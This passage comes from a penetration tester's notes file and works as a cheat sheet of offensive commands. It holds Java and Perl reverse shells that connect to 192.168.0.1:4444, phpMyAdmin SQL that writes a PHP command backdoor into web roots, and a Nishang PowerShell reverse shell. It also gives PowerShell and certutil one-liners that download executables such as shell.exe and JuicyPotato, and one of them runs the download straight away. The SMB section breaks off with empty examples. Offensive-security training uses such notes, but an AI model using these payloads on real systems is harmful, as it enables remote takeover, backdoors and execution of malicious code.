<rich_text family="monospace"> ProcessBuilder(cmd)</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">redirectErrorStream(</rich_text>
<rich_text family="monospace" foreground="#005cc5">true</rich_text>
<rich_text family="monospace">)</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">start();Socket s</rich_text>
<rich_text family="monospace" foreground="#d73a49">=new</rich_text>
<rich_text family="monospace"> Socket(host,port);InputStream pi</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getInputStream(),pe</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getErrorStream(), si</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">s</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getInputStream();OutputStream po</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getOutputStream(),so</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">s</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getOutputStream();</rich_text>
<rich_text family="monospace" foreground="#d73a49">while</rich_text>
<rich_text family="monospace">(</rich_text>
<rich_text family="monospace" foreground="#d73a49">!</rich_text>
<rich_text family="monospace">s</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">isClosed()){</rich_text>
<rich_text family="monospace" foreground="#d73a49">while</rich_text>
<rich_text family="monospace">(pi</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">available()</rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace" foreground="#005cc5">0</rich_text>
<rich_text family="monospace">)so</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">write(pi</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">read());</rich_text>
<rich_text family="monospace" foreground="#d73a49">while</rich_text>
<rich_text family="monospace">(pe</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">available()</rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace" foreground="#005cc5">0</rich_text>
<rich_text family="monospace">)so</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">write(pe</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">read());</rich_text>
<rich_text family="monospace" foreground="#d73a49">while</rich_text>
<rich_text family="monospace">(si</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">available()</rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace" foreground="#005cc5">0</rich_text>
<rich_text family="monospace">)po</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">write(si</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">read());so</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">flush();po</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">flush();Thread</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">sleep(</rich_text>
<rich_text family="monospace" foreground="#005cc5">50</rich_text>
<rich_text family="monospace">);</rich_text>
<rich_text family="monospace" foreground="#d73a49">try</rich_text>
<rich_text family="monospace"> {p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">exitValue();</rich_text>
<rich_text family="monospace" foreground="#d73a49">break</rich_text>
<rich_text family="monospace">;}</rich_text>
<rich_text family="monospace" foreground="#d73a49">catch</rich_text>
<rich_text family="monospace"> (Exception e){}};p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">destroy();s</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">close();</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Windows Reverse Shell</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">String host</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">"192.168.0.1";
</rich_text>
<rich_text family="monospace" foreground="#d73a49">int</rich_text>
<rich_text family="monospace"> port</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace" foreground="#005cc5">4444</rich_text>
<rich_text family="monospace">;
String cmd</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">"cmd.exe";
Process p</rich_text>
<rich_text family="monospace" foreground="#d73a49">=new</rich_text>
<rich_text family="monospace"> ProcessBuilder(cmd)</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">redirectErrorStream(</rich_text>
<rich_text family="monospace" foreground="#005cc5">true</rich_text>
<rich_text family="monospace">)</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">start();Socket s</rich_text>
<rich_text family="monospace" foreground="#d73a49">=new</rich_text>
<rich_text family="monospace"> Socket(host,port);InputStream pi</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getInputStream(),pe</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getErrorStream(), si</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">s</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getInputStream();OutputStream po</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getOutputStream(),so</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">s</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">getOutputStream();</rich_text>
<rich_text family="monospace" foreground="#d73a49">while</rich_text>
<rich_text family="monospace">(</rich_text>
<rich_text family="monospace" foreground="#d73a49">!</rich_text>
<rich_text family="monospace">s</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">isClosed()){</rich_text>
<rich_text family="monospace" foreground="#d73a49">while</rich_text>
<rich_text family="monospace">(pi</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">available()</rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace" foreground="#005cc5">0</rich_text>
<rich_text family="monospace">)so</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">write(pi</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">read());</rich_text>
<rich_text family="monospace" foreground="#d73a49">while</rich_text>
<rich_text family="monospace">(pe</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">available()</rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace" foreground="#005cc5">0</rich_text>
<rich_text family="monospace">)so</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">write(pe</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">read());</rich_text>
<rich_text family="monospace" foreground="#d73a49">while</rich_text>
<rich_text family="monospace">(si</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">available()</rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace" foreground="#005cc5">0</rich_text>
<rich_text family="monospace">)po</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">write(si</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">read());so</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">flush();po</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">flush();Thread</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">sleep(</rich_text>
<rich_text family="monospace" foreground="#005cc5">50</rich_text>
<rich_text family="monospace">);</rich_text>
<rich_text family="monospace" foreground="#d73a49">try</rich_text>
<rich_text family="monospace"> {p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">exitValue();</rich_text>
<rich_text family="monospace" foreground="#d73a49">break</rich_text>
<rich_text family="monospace">;}</rich_text>
<rich_text family="monospace" foreground="#d73a49">catch</rich_text>
<rich_text family="monospace"> (Exception e){}};p</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">destroy();s</rich_text>
<rich_text family="monospace" foreground="#d73a49">.</rich_text>
<rich_text family="monospace">close();</rich_text>
<rich_text>
</rich_text>
</node>
<node name="Perl" unique_id="81" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Perl</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Reverse Shell</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">perl -MIO </rich_text>
<rich_text family="monospace" foreground="#d73a49">-e</rich_text>
<rich_text family="monospace"> 'use Socket;$ip="192.168.0.1";$port=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'</rich_text>
<rich_text>
</rich_text>
</node>
<node name="PhpmyAdmin" unique_id="82" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">PhpmyAdmin
</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text style="italic">Write a CMD shell into a file with the right permissions. Issue the following select. (Try different paths for different webservers)</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Windows</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace" foreground="#d73a49">SELECT</rich_text>
<rich_text family="monospace"> "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Unix</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace" foreground="#d73a49">SELECT</rich_text>
<rich_text family="monospace"> "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"</rich_text>
</node>
<node name="powershell" unique_id="105" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1701626719" ts_lastsave="1701626901">
<rich_text>
</rich_text>
<rich_text link="webs https://github.com/samratashok/nishang/tree/master/Shells">https://github.com/samratashok/nishang/tree/master/Shells</rich_text>
<rich_text>
use this
Ex: `</rich_text>
<rich_text justification="left"></rich_text>
<codebox char_offset="78" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444`</codebox>
</node>
</node>
<node name="File Transfer" unique_id="49" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690604" ts_lastsave="1687690604">
<node name="Powershell" unique_id="50" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690604" ts_lastsave="1707660323">
<rich_text underline="single" scale="h1">Powershell</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">As Cmd.exe Command</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">powershell -ExecutionPolicy bypass -noprofile -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.1:80/winprivesc/JuicyPotato.exe','C:\Users\john\Desktop\juicy.exe')</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Encode Command for Transfer</rich_text>
<rich_text>
Very helpful for chars that need to be escaped otherwise.
</rich_text>
<rich_text family="monospace">$Command = '(new-object System.Net.WebClient).DownloadFile("http://192.168.0.1:80/ftp.txt","C:\Windows\temp\ftp.txt")'
$Encoded = [convert]::ToBase64String([System.Text.encoding]::Unicode.GetBytes($command))
powershell.exe -NoProfile -encoded $Encoded</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
or
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
</rich_text>
<codebox char_offset="665" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">certutil -urlcache -f http://10.11.14.21/rev.exe rev.exe</codebox>
</node>
<node name="Certutil" unique_id="51" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690604" ts_lastsave="1687690604">
<rich_text underline="single" scale="h1">Certutil</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Download</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">certutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Download & Execute Python Command</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">os.execute('cmd.exe /c certutil.exe -urlcache -split -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe & C:\Windows\Temp\shell.exe')</rich_text>
<rich_text>
</rich_text>
</node>
<node name="SMB" unique_id="52" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690604" ts_lastsave="1712000157">
<rich_text underline="single" scale="h1">SMB</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single" scale="h2">Start Impacket SMB Server on Attacker Machine(With SMB2 Support)</rich_text>
<rich_text>
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
Ex:
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
Please note , if u wont provide username and password sometime it wont work
</rich_text>
<rich_text scale="h2">Authentication on Victim</rich_text>
<rich_text>
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
Ex:
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
</rich_text>
<rich_text scale="h2">Copy Files (Execute on Victim)</rich_text>
<rich_text>
From attacker to victim:
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
Ex:
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
from Victim to attacker: